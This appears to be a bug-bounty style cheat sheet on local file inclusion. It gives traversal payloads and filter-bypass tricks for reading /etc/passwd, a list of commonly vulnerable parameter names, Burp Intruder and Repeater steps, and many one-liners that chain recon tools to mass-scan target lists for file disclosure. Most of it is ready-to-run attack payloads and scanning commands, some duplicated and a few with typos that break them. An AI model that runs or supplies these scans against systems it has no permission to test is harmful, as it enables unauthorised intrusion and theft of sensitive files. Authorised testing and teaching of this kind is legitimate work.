🧨My LFI Methodology

TIP: file:///etc/passwd : Not authorized file://\/\/etc/passwd : Work

---------------------------------------------------------------

TIP: file:///etc/passwd blacklisted?

Use "view-source:file:///etc/passwd" "view-source" is often forgotten by developers in blacklists.

---------------------------------------------------------------

File Download to Check LFI

File Download Path Send to Burp intruder

Select Parameter Value to Payload Position

Select Burp Payload List: Fuzzing-Path Traversal (Single File)

Configuring the file name from Payload Processing -> Match/Replace rule:

Match regex: \{file\}

Replace with: etc/passwd

---------------------------------------------------------------

Check LFI Methods

File Download Path Send to Burp Repeater

Select Parameter Value to check Payload one by one

../../../etc/passwd <-- using Simple Check

/etc/passwd <-- using blocks directory traversal Sequences

....//....//....//etc/passwd <-- usingsequences stripped non-recursively

/var/www/images/../../../etc/passwd <-- using Default directories

../../../etc/passwd%00.png <-- with file extension using null byte

-------------------------------------------------------------

Top 25 parameters

Here’s list of top 25 parameters that could be vulnerable to local file inclusion (LFI) vulnerabilities

• ?cat={payload}
  ?dir={payload}
  ?action={payload}
  ?board={payload}
  ?date={payload}
  ?detail={payload}
  ?file={payload}
  ?download={payload}
  ?path={payload}
  ?folder={payload}
  ?prefix={payload}
  ?include={payload}
  ?page={payload}
  ?inc={payload}
  ?locate={payload}
  ?show={payload}
  ?doc={payload}
  ?site={payload}
  ?type={payload}
  ?view={payload}
  ?content={payload}
  ?document={payload}
  ?layout={payload}
  ?mod={payload}
  ?conf={payload}

---------------------------------------------------------------

Local file inclusion at filemanager.php Endpoint

Parameter: path=

Payload: //....//....//....//....//....//....//....//....//....//etc/passwd

----------------------------------------------------------------

LFI Automate this with a one-liner

cat roots | assetfinder -subs-only | waybackurls | qsreplace "//....//....//....//....//....//....//....//....//....//etc/passwd" | httpx -nc -silent -mr "root:x" -t 5

----------------------------------------------------------------

(1) One-Liner LFI Finding

gau http://testphp.vulnweb.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

----------------------------------------------------------------

(2) One-Liner LFI Finding

echo http://testphp.vulnweb.com | gau | gf lfi | bhedak ".%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd" | httpx -silent -ms "root:x:"

----------------------------------------------------------------

(3) One-Liner LFI Finding

waybackurls http://testphp.vulnweb.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

----------------------------------------------------------------

(4) One-Liner LFI Finding

cat targets.txt | while read host do ; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n";done

----------------------------------------------------------------

(5) One-Liner LFI Finding

findomain -t http://testphp.vulnweb.com -q | /root/go/bin/waybackurls | /root/go/bin/gf lfi | /root/go/bin/qsreplace FUZZ | while read url ; do ffuf -u $url -mr “root:x” -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-etc-files-of-all-linux-packages.txt ; done

----------------------------------------------------------------

(6) One-Liner NGINX LFI Finding

httpx -l file.txt -path "///////../../../../../../etc/passwd" -status-code -mc 200 -ms 'root:'

----------------------------------------------------------------

(7) One-Liner LFI Finding

waybackurls http://testphp.vulnweb.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

----------------------------------------------------------------

(8) One-Liner LFI Finding

cat targets.txt | while read host do ; do curl --silent --path-as-is --insecure "$host/ cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n";done

----------------------------------------------------------------

(8) One-Liner LFI Finding

gau http://testphp.vulnweb.com | gf lfi | qsreplace "/etc/passwd" | httpx -t 250 -mr "root:x"

----------------------------------------------------------------

(9) One-Liner LFI Finding

gau http://testphp.vulnweb.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

----------------------------------------------------------------

(10) One-Liner LFI Finding

cat targets.txt | /root/go/bin/httpx -nc -t 250 -p 80,443,8080,8443,4443,8888 -path "///////../../../ctc/paawd" -mr "root:x" | /root/go/bin/anew lfi-httpx.txt

----------------------------------------------------------------

(11) One-Liner LFI Finding

cat targets.txt | httpx -silent -threads 500 | gau | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

----------------------------------------------------------------

(12) One-Liner LFI Finding

findomain -t vulnweb.com -q | /root/go/bin/waybackurls | /root/go/bin/gf lfi | /root/go/bin/qsreplace FUZZ | while read url ; do ffuf -u $url -mr "root:x" -w ~/wordlist/LFI.txt ; done

----------------------------------------------------------------

Endpoint of attack parameter

(dest =, redirect=,uri=,url=,path=,continue=,window,next,data,reference,site,html,val,validate,domain,callback,return,page,view,dir,show,file,document,root,folder,root,pg,style,pdf,feed,port,to,oot,navigation,open,result)

----------------------------------------------------------------

How to Find LFI Manual Using Burp Hackbar

1st target add to Scope then Crawling Pages and endpoints like: Page= , path=, file= open the Burp tab and click to Search Buton and Search for lfi Endpoints like: file= in Request Body then request sent to Repeater add to Lfi Payloads like: GET /showimage.php?file=../../etc/passwd using burp Hackbar and looking fo Responce then BOOM

----------------------------------------------------------------

How to Find LFI Using Burp Intruder | LFI Payload.txt

1st target add to Scope then Crawling Pages and endpoints like: Page= , path=, file= open the Burp tab and click to Search Buton and Search for lfi Endpoints like: file= in Request Body then request sent to Burp intruder and Select the Payload Position After Endpoint like: GET /showimage.php?file=../../etc/passwd and add to LFI_Payloads.txt in Payload Section then go to option tab and add to text root❌0:0:root: Grep-Mathch Section and start the Attack and looking for root❌0:0:root: Coloum Responce then BOOM

----------------------------------------------------------------

How to Find LFI Using wayback | gf | Burp Hackbar

/root/go/bin/waybackurl -u Target.com | /root/go/bin/gf lfi >> lfi.txt cat lfi.txt and Search for lfi Endpoints like: Page= , path= , file= in URl then open browser then request sent to Burp Repeater add to Lfi Payloads like: GET /showimage.php?file=../../etc/passwd using burp Hackbar and looking fo Responce then BOOM

----------------------------------------------------------------

How to Find LFI Using wayback | gf | Burp Intruder | LFI Payload.txt

/root/go/bin/waybackurl -u Target.com | /root/go/bin/gf lfi >> lfi.txt cat lfi.txt and Search for lfi Endpoints like: Page= , path= , file= in URl then open browser then request sent to Burp intruder and Select the Payload Position After Endpoint like: GET /showimage.php?file=../../etc/passwd and add to LFI_Payloads.txt in Payload Section then go to option tab and add to text root❌0:0:root: Grep-Mathch Section and start the Attack and looking for root❌0:0:root: Coloum Responce then BOOM

----------------------------------------------------------------